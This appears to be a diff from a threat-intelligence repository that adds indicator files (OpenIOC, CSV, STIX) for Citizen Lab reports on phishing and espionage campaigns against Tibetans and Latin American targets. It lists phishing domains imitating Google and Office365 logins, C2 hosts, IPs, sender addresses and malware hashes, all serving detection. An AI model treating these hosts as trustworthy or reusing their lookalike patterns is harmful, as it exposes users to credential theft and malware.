<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="cu9.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="asambleanacional-gob-ec.cu9.co" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="mail.asambleanacional.gob.ec" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="formmail.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="login-office365.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="pancaliente.info" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="focusecuador.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="gmail.com.msg07.xyz" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="supportgmai1.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="chavistas24.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="ns1.hostinger.ru" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="venezuela365.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="justicia-desvinculados.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="50.62.133.49" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="192.169.243.65" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="190.210.180.181" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="201.52.24.126" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="190.20.180.181" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="186.220.1.84" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="186.220.11.67" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="189.100.148.188" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="179.208.187.216" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="46.246.89.246" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="198.12.150.249" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="50.63.202.57" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="193.105.134.27" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="http://ecuadorenvivo.com/videos/el-meme-que-volvio-loco-a-correa.html" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="http://ecuadorenvivo.co/videos/el-meme-que-volvio-loco-a-correa.html" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="http://mail.asambleanacional.gob.ec" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="http://pancaliente.info/los-negocios-secretos-de-leocenis-garcia-y-gonzalo-tirado" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="http://venezuela365.com/wp-content/uploads/2014/10/tirado-g-300×169.jpg" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="claudiobonadio88@gmail.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="cfed.bonadio@gmail.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="focusedtior1@gmail.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="no.response.delivery.es@gmail.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="enripintos123@outlook.es" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="movimiento.anti.correista@gmail.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="no-responder@supportgmai1.com" condition="is">
<Context document="Email" search="Email/From" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
</Indicator>
</definition>
</ioc>

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,8 @@
## Shifting Tactics IOCs
This directory contains IOC from the Citizen Lab report [Shifting Tactics: Tracking changes in years-long espionage campaign against Tibetans](https://citizenlab.org/2016/03/shifting-tactics/) published the 10th of May 2016.
Files included in this directory:
* openioc.ioc : IOCs in OpenIOC format
* stix.xml : IOCs in STIX XML format
* iocs.csv : IOCs in csv format

View File

@@ -0,0 +1,37 @@
uuid,event_id,category,type,value,comment,to_ids,date
11bb35af-5ad7-4a10-844c-fb4482603b0b,11,Network activity,url,"http://accountgoogle.firewall-gateway.com/serviclogin","Decoy webpage",0,20160310
11cf9c54-4d35-4a58-8128-a1076025ff25,11,Network activity,domain,"sys.firewall-gateway.net","C2 domain",1,20160310
1f0bc371-f681-4049-855d-235e6bc5eb8e,11,Network activity,ip-dst,"5.54.19.17","",1,20160310
228f765c-d5ab-4fcf-a190-775b9ed2ad70,11,Network activity,domain,"firewallupdate.firewall-gateway.com","Domain found through passive DNS",1,20160310
23403344-c52e-4c19-9f7b-f5291b451bee,11,Payload delivery,md5,"fef27f432e0ae8218143bc410fda340e","",1,20160310
26fb914b-1601-4049-a8b5-c9afc3a16bc0,11,Network activity,domain,"accountgoogle.firewall-gateway.com","Phishing Campaign Infrastructure",1,20160310
318dd748-c9d9-4f7b-9b42-75a60001f9e1,11,Network activity,ip-dst,"95.154.195.171","",1,20160310
35a7486a-38a7-4d3a-bdd8-1284d464484b,11,Network activity,domain,"firewallupdate.firewall-gateway.net","Domain found through passive DNS",1,20160310
3baf841e-c377-44ba-ba20-dcfd7aa8ba22,11,Network activity,domain,"accounts-google.firewall-gateway.com","Domain found through passive DNS",1,20160310
40edc447-3aaa-4f79-8268-16eddff19b33,11,Network activity,domain,"accountsgoogles.firewall-gateway.com","Domain found through passive DNS",1,20160310
53477c01-59ad-47be-b808-4c6b518523fc,11,Network activity,ip-dst,"109.169.77.230","Resolve domain news[.]firewall-gateway[.]com",1,20160310
581c1169-35f8-439b-ad90-49798e96ca05,11,External analysis,link,"https://citizenlab.org/2016/03/shifting-tactics/","",0,20161104
5824e149-ba7c-4e04-b905-69fe8e96ca05,11,Artifacts dropped,md5,"ea45265fe98b25e719d5a9cc3b412d66","uroyh.exe",1,20160310
5824e1e5-e340-40b0-b3fa-69fe8e96ca05,11,Attribution,threat-actor,"Scarlet Mimic","",0,20160310
5824e33f-4c08-4b5f-8092-497a8e96ca05,11,Payload type,text,"FakeM","",0,20160310
6308d2e1-a83a-44b2-b96f-267bc24efbd1,11,Network activity,domain,"filegoogle.firewall-gateway.com","Phishing Campaign Infrastructure",1,20160310
633179a0-3d6e-4ca5-9b89-02d8522ef275,11,Payload delivery,filename,"Reappraisal_of_India_Tibet_Policy.doc","",0,20160310
6d15c4fe-2de7-4abc-9593-c9eeae9b928f,11,Payload delivery,md5,"3b869c8e23d66ad0527882fc79ff7237","",1,20160310
712c9cc1-2b2b-4636-87d2-12bd313376dc,11,Payload delivery,md5,"1bf438b5744db73eea58379a3b9f30e5","",1,20160310
73e5412a-1252-495d-956d-28cfdd8edaed,11,Network activity,domain,"news.firewall-gateway.com","",1,20160310
86627daf-07c8-467f-babc-426d586e7d4a,11,Network activity,domain,"detail43.myfirewall.org","",1,20160310
8b0a371b-0c73-455d-a7ae-d0a530f23b04,11,Network activity,domain,"drivgoogle.firewall-gateway.com","Domain found through passive DNS",1,20160310
8ce49cb3-e458-4568-b560-04a314ce9539,11,Network activity,ip-dst,"192.253.251.118","",1,20160310
99702482-486a-4b63-8fa9-f094835827b2,11,Payload delivery,md5,"5c030802ad411fea059cc9cc4c118125","uroyh-unpacked.exe",1,20160310
a31a03ec-f99e-4bec-95dc-3574c3512217,11,Network activity,ip-dst,"95.154.195.159","",1,20160310
a95b5c9c-7ec9-42ff-a12c-075b3255de77,11,Payload delivery,md5,"7735e571d0450e2a31e97e4f8e0f66fa","Attached file",1,20160310
ad5c4c3d-6194-4059-9aa1-1593b62d32a9,11,Network activity,ip-dst,"109.169.40.172","",1,20160310
b2cebdea-e90b-416f-9a0f-94a566b32a2a,11,Network activity,ip-dst,"46.127.56.109","",1,20160310
b84e33b7-1958-4507-b7bb-6bb63304842c,11,Network activity,domain,"googlefile.firewall-gateway.net","Domain found through passive DNS",1,20160310
baf16087-e811-438d-bcdd-9779043dfb06,11,Payload delivery,md5,"d2e9412428c3bcf3ec98dba8a78adb7b","iph.bat",1,20160310
c379b263-55d3-464d-b94f-178f02f883a8,11,Network activity,ip-dst,"87.117.229.109","",1,20160310
cda51492-e33b-4521-be3b-35ec4b8bc9b4,11,Network activity,url,"http://accountgoogle.firewall-gateway.com/servicclogin","Decoy webpage",0,20160310
dbabd2ee-213d-4b02-951f-a020cfc3582e,11,Payload delivery,md5,"8b83fc5d3a6a80281269f9e337fe3fff","pshvb.exe",1,20160310
ebbe87e2-7f84-4f68-b766-f63820da7966,11,Network activity,domain,"accountsgoogle.firewall-gateway.com","Domain found through passive DNS",1,20160310
f48470fd-c782-4831-a20d-4704b62f1358,11,Network activity,ip-dst,"78.129.252.159","",1,20160310
fc6d0f74-9e43-44a7-b7b8-0ca5c7c487e6,11,Network activity,url,"http://filegoogle.firewall-gateway.com/servicelogin","Decoy webpage",1,20160310
1 uuid event_id category type value comment to_ids date
2 11bb35af-5ad7-4a10-844c-fb4482603b0b 11 Network activity url http://accountgoogle.firewall-gateway.com/serviclogin Decoy webpage 0 20160310
3 11cf9c54-4d35-4a58-8128-a1076025ff25 11 Network activity domain sys.firewall-gateway.net C2 domain 1 20160310
4 1f0bc371-f681-4049-855d-235e6bc5eb8e 11 Network activity ip-dst 5.54.19.17 1 20160310
5 228f765c-d5ab-4fcf-a190-775b9ed2ad70 11 Network activity domain firewallupdate.firewall-gateway.com Domain found through passive DNS 1 20160310
6 23403344-c52e-4c19-9f7b-f5291b451bee 11 Payload delivery md5 fef27f432e0ae8218143bc410fda340e 1 20160310
7 26fb914b-1601-4049-a8b5-c9afc3a16bc0 11 Network activity domain accountgoogle.firewall-gateway.com Phishing Campaign Infrastructure 1 20160310
8 318dd748-c9d9-4f7b-9b42-75a60001f9e1 11 Network activity ip-dst 95.154.195.171 1 20160310
9 35a7486a-38a7-4d3a-bdd8-1284d464484b 11 Network activity domain firewallupdate.firewall-gateway.net Domain found through passive DNS 1 20160310
10 3baf841e-c377-44ba-ba20-dcfd7aa8ba22 11 Network activity domain accounts-google.firewall-gateway.com Domain found through passive DNS 1 20160310
11 40edc447-3aaa-4f79-8268-16eddff19b33 11 Network activity domain accountsgoogles.firewall-gateway.com Domain found through passive DNS 1 20160310
12 53477c01-59ad-47be-b808-4c6b518523fc 11 Network activity ip-dst 109.169.77.230 Resolve domain news[.]firewall-gateway[.]com 1 20160310
13 581c1169-35f8-439b-ad90-49798e96ca05 11 External analysis link https://citizenlab.org/2016/03/shifting-tactics/ 0 20161104
14 5824e149-ba7c-4e04-b905-69fe8e96ca05 11 Artifacts dropped md5 ea45265fe98b25e719d5a9cc3b412d66 uroyh.exe 1 20160310
15 5824e1e5-e340-40b0-b3fa-69fe8e96ca05 11 Attribution threat-actor Scarlet Mimic 0 20160310
16 5824e33f-4c08-4b5f-8092-497a8e96ca05 11 Payload type text FakeM 0 20160310
17 6308d2e1-a83a-44b2-b96f-267bc24efbd1 11 Network activity domain filegoogle.firewall-gateway.com Phishing Campaign Infrastructure 1 20160310
18 633179a0-3d6e-4ca5-9b89-02d8522ef275 11 Payload delivery filename Reappraisal_of_India_Tibet_Policy.doc 0 20160310
19 6d15c4fe-2de7-4abc-9593-c9eeae9b928f 11 Payload delivery md5 3b869c8e23d66ad0527882fc79ff7237 1 20160310
20 712c9cc1-2b2b-4636-87d2-12bd313376dc 11 Payload delivery md5 1bf438b5744db73eea58379a3b9f30e5 1 20160310
21 73e5412a-1252-495d-956d-28cfdd8edaed 11 Network activity domain news.firewall-gateway.com 1 20160310
22 86627daf-07c8-467f-babc-426d586e7d4a 11 Network activity domain detail43.myfirewall.org 1 20160310
23 8b0a371b-0c73-455d-a7ae-d0a530f23b04 11 Network activity domain drivgoogle.firewall-gateway.com Domain found through passive DNS 1 20160310
24 8ce49cb3-e458-4568-b560-04a314ce9539 11 Network activity ip-dst 192.253.251.118 1 20160310
25 99702482-486a-4b63-8fa9-f094835827b2 11 Payload delivery md5 5c030802ad411fea059cc9cc4c118125 uroyh-unpacked.exe 1 20160310
26 a31a03ec-f99e-4bec-95dc-3574c3512217 11 Network activity ip-dst 95.154.195.159 1 20160310
27 a95b5c9c-7ec9-42ff-a12c-075b3255de77 11 Payload delivery md5 7735e571d0450e2a31e97e4f8e0f66fa Attached file 1 20160310
28 ad5c4c3d-6194-4059-9aa1-1593b62d32a9 11 Network activity ip-dst 109.169.40.172 1 20160310
29 b2cebdea-e90b-416f-9a0f-94a566b32a2a 11 Network activity ip-dst 46.127.56.109 1 20160310
30 b84e33b7-1958-4507-b7bb-6bb63304842c 11 Network activity domain googlefile.firewall-gateway.net Domain found through passive DNS 1 20160310
31 baf16087-e811-438d-bcdd-9779043dfb06 11 Payload delivery md5 d2e9412428c3bcf3ec98dba8a78adb7b iph.bat 1 20160310
32 c379b263-55d3-464d-b94f-178f02f883a8 11 Network activity ip-dst 87.117.229.109 1 20160310
33 cda51492-e33b-4521-be3b-35ec4b8bc9b4 11 Network activity url http://accountgoogle.firewall-gateway.com/servicclogin Decoy webpage 0 20160310
34 dbabd2ee-213d-4b02-951f-a020cfc3582e 11 Payload delivery md5 8b83fc5d3a6a80281269f9e337fe3fff pshvb.exe 1 20160310
35 ebbe87e2-7f84-4f68-b766-f63820da7966 11 Network activity domain accountsgoogle.firewall-gateway.com Domain found through passive DNS 1 20160310
36 f48470fd-c782-4831-a20d-4704b62f1358 11 Network activity ip-dst 78.129.252.159 1 20160310
37 fc6d0f74-9e43-44a7-b7b8-0ca5c7c487e6 11 Network activity url http://filegoogle.firewall-gateway.com/servicelogin Decoy webpage 1 20160310

View File

@@ -0,0 +1,133 @@
<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="581c1131-3fec-4068-bb74-49798e96ca05" last-modified="2016-03-10T00:00:00" xmlns="http://schemas.mandiant.com/2010/ioc">
<short_description>Event #11</short_description>
<description>Shifting Tactics: Tracking changes in years-long espionage campaign against Tibetans</description>
<keywords />
<authored_by>citizenlab</authored_by>
<authored_date>2016-03-10T00:00:00</authored_date>
<links />
<definition>
<Indicator operator="OR" id="581c1131-3fec-4068-bb74-49798e96ca05">
<IndicatorItem id="ea45265fe98b25e719d5a9cc3b412d66" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="filegoogle.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="accountgoogle.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="sys.firewall-gateway.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="news.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="accountsgoogle.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="accounts-google.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="accountsgoogles.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="googlefile.firewall-gateway.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="firewallupdate.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="firewallupdate.firewall-gateway.net" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="drivgoogle.firewall-gateway.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="detail43.myfirewall.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="95.154.195.159" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="95.154.195.171" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="5.54.19.17" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="78.129.252.159" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="87.117.229.109" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="109.169.40.172" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="46.127.56.109" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="192.253.251.118" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="109.169.77.230" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="http://filegoogle.firewall-gateway.com/servicelogin" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="5c030802ad411fea059cc9cc4c118125" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="7735e571d0450e2a31e97e4f8e0f66fa" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d2e9412428c3bcf3ec98dba8a78adb7b" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="1bf438b5744db73eea58379a3b9f30e5" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="3b869c8e23d66ad0527882fc79ff7237" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="fef27f432e0ae8218143bc410fda340e" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="8b83fc5d3a6a80281269f9e337fe3fff" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
</Indicator>
</definition>
</ioc>

View File

@@ -0,0 +1,982 @@
<stix:STIX_Package
xmlns:cyboxCommon="http://cybox.mitre.org/common-2"
xmlns:cybox="http://cybox.mitre.org/cybox-2"
xmlns:cyboxVocabs="http://cybox.mitre.org/default_vocabularies-2"
xmlns:ASObj="http://cybox.mitre.org/objects#ASObject-1"
xmlns:AddressObj="http://cybox.mitre.org/objects#AddressObject-2"
xmlns:DomainNameObj="http://cybox.mitre.org/objects#DomainNameObject-1"
xmlns:EmailMessageObj="http://cybox.mitre.org/objects#EmailMessageObject-2"
xmlns:FileObj="http://cybox.mitre.org/objects#FileObject-2"
xmlns:HTTPSessionObj="http://cybox.mitre.org/objects#HTTPSessionObject-2"
xmlns:HostnameObj="http://cybox.mitre.org/objects#HostnameObject-1"
xmlns:MutexObj="http://cybox.mitre.org/objects#MutexObject-2"
xmlns:PipeObj="http://cybox.mitre.org/objects#PipeObject-2"
xmlns:URIObj="http://cybox.mitre.org/objects#URIObject-2"
xmlns:WinRegistryKeyObj="http://cybox.mitre.org/objects#WinRegistryKeyObject-2"
xmlns:marking="http://data-marking.mitre.org/Marking-1"
xmlns:tlpMarking="http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1"
xmlns:et="http://stix.mitre.org/ExploitTarget-1"
xmlns:incident="http://stix.mitre.org/Incident-1"
xmlns:indicator="http://stix.mitre.org/Indicator-2"
xmlns:ttp="http://stix.mitre.org/TTP-1"
xmlns:ta="http://stix.mitre.org/ThreatActor-1"
xmlns:stixCommon="http://stix.mitre.org/common-1"
xmlns:stixVocabs="http://stix.mitre.org/default_vocabularies-1"
xmlns:stix-ciqidentity="http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1"
xmlns:snortTM="http://stix.mitre.org/extensions/TestMechanism#Snort-1"
xmlns:stix="http://stix.mitre.org/stix-1"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:="https://rufus.citlab.utoronto.ca"
xmlns:xal="urn:oasis:names:tc:ciq:xal:3"
xmlns:xnl="urn:oasis:names:tc:ciq:xnl:3"
xmlns:xpil="urn:oasis:names:tc:ciq:xpil:3"
xsi:schemaLocation="
http://cybox.mitre.org/common-2 http://cybox.mitre.org/XMLSchema/common/2.1/cybox_common.xsd
http://cybox.mitre.org/cybox-2 http://cybox.mitre.org/XMLSchema/core/2.1/cybox_core.xsd
http://cybox.mitre.org/default_vocabularies-2 http://cybox.mitre.org/XMLSchema/default_vocabularies/2.1/cybox_default_vocabularies.xsd
http://cybox.mitre.org/objects#ASObject-1 http://cybox.mitre.org/XMLSchema/objects/AS/1.0/AS_Object.xsd
http://cybox.mitre.org/objects#AddressObject-2 http://cybox.mitre.org/XMLSchema/objects/Address/2.1/Address_Object.xsd
http://cybox.mitre.org/objects#DomainNameObject-1 http://cybox.mitre.org/XMLSchema/objects/Domain_Name/1.0/Domain_Name_Object.xsd
http://cybox.mitre.org/objects#EmailMessageObject-2 http://cybox.mitre.org/XMLSchema/objects/Email_Message/2.1/Email_Message_Object.xsd
http://cybox.mitre.org/objects#FileObject-2 http://cybox.mitre.org/XMLSchema/objects/File/2.1/File_Object.xsd
http://cybox.mitre.org/objects#HTTPSessionObject-2 http://cybox.mitre.org/XMLSchema/objects/HTTP_Session/2.1/HTTP_Session_Object.xsd
http://cybox.mitre.org/objects#HostnameObject-1 http://cybox.mitre.org/XMLSchema/objects/Hostname/1.0/Hostname_Object.xsd
http://cybox.mitre.org/objects#MutexObject-2 http://cybox.mitre.org/XMLSchema/objects/Mutex/2.1/Mutex_Object.xsd
http://cybox.mitre.org/objects#PipeObject-2 http://cybox.mitre.org/XMLSchema/objects/Pipe/2.1/Pipe_Object.xsd
http://cybox.mitre.org/objects#URIObject-2 http://cybox.mitre.org/XMLSchema/objects/URI/2.1/URI_Object.xsd
http://cybox.mitre.org/objects#WinRegistryKeyObject-2 http://cybox.mitre.org/XMLSchema/objects/Win_Registry_Key/2.1/Win_Registry_Key_Object.xsd
http://data-marking.mitre.org/Marking-1 http://stix.mitre.org/XMLSchema/data_marking/1.1.1/data_marking.xsd
http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1 http://stix.mitre.org/XMLSchema/extensions/marking/tlp/1.1.1/tlp_marking.xsd
http://stix.mitre.org/ExploitTarget-1 http://stix.mitre.org/XMLSchema/exploit_target/1.1.1/exploit_target.xsd
http://stix.mitre.org/Incident-1 http://stix.mitre.org/XMLSchema/incident/1.1.1/incident.xsd
http://stix.mitre.org/Indicator-2 http://stix.mitre.org/XMLSchema/indicator/2.1.1/indicator.xsd
http://stix.mitre.org/TTP-1 http://stix.mitre.org/XMLSchema/ttp/1.1.1/ttp.xsd
http://stix.mitre.org/ThreatActor-1 http://stix.mitre.org/XMLSchema/threat_actor/1.1.1/threat_actor.xsd
http://stix.mitre.org/common-1 http://stix.mitre.org/XMLSchema/common/1.1.1/stix_common.xsd
http://stix.mitre.org/default_vocabularies-1 http://stix.mitre.org/XMLSchema/default_vocabularies/1.1.1/stix_default_vocabularies.xsd
http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1 http://stix.mitre.org/XMLSchema/extensions/identity/ciq_3.0/1.1.1/ciq_3.0_identity.xsd
http://stix.mitre.org/extensions/TestMechanism#Snort-1 http://stix.mitre.org/XMLSchema/extensions/test_mechanism/snort/1.1.1/snort_test_mechanism.xsd
http://stix.mitre.org/stix-1 http://stix.mitre.org/XMLSchema/core/1.1.1/stix_core.xsd
urn:oasis:names:tc:ciq:xal:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xAL.xsd
urn:oasis:names:tc:ciq:xnl:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xNL.xsd
urn:oasis:names:tc:ciq:xpil:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xPIL.xsd" id=":Package-dab87d63-6901-4da5-b7ba-2088de90f322" version="1.1.1" timestamp="2016-11-10T21:17:23.793648+00:00">
<stix:STIX_Header>
<stix:Title>Export from MISP</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:Related_Packages>
<stix:Related_Package>
<stix:Package id=":STIXPackage-581c1131-3fec-4068-bb74-49798e96ca05" version="1.1.1" timestamp="2016-11-10T16:14:39+00:00">
<stix:STIX_Header>
<stix:Title>Shifting Tactics: Tracking changes in years-long espionage campaign against Tibetans (MISP Event #11)</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:TTPs>
<stix:TTP id=":ttp-5824e33f-4c08-4b5f-8092-497a8e96ca05" timestamp="2016-11-10T16:14:39+00:00" xsi:type='ttp:TTPType'>
<ttp:Title>Payload type: FakeM (MISP Attribute #1875)</ttp:Title>
<ttp:Behavior>
<ttp:Malware>
<ttp:Malware_Instance>
<ttp:Name>FakeM</ttp:Name>
</ttp:Malware_Instance>
</ttp:Malware>
</ttp:Behavior>
</stix:TTP>
</stix:TTPs>
<stix:Incidents>
<stix:Incident id=":incident-581c1131-3fec-4068-bb74-49798e96ca05" timestamp="2016-11-10T16:15:08+00:00" xsi:type='incident:IncidentType'>
<incident:Title>Shifting Tactics: Tracking changes in years-long espionage campaign against Tibetans</incident:Title>
<incident:External_ID source="MISP Event">11</incident:External_ID>
<incident:Time>
<incident:Incident_Discovery precision="second">2016-03-10T00:00:00+00:00</incident:Incident_Discovery>
<incident:Incident_Reported precision="second">2016-11-10T16:15:08+00:00</incident:Incident_Reported>
</incident:Time>
<incident:Status xsi:type="stixVocabs:IncidentStatusVocab-1.0">Closed</incident:Status>
<incident:Related_Indicators>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
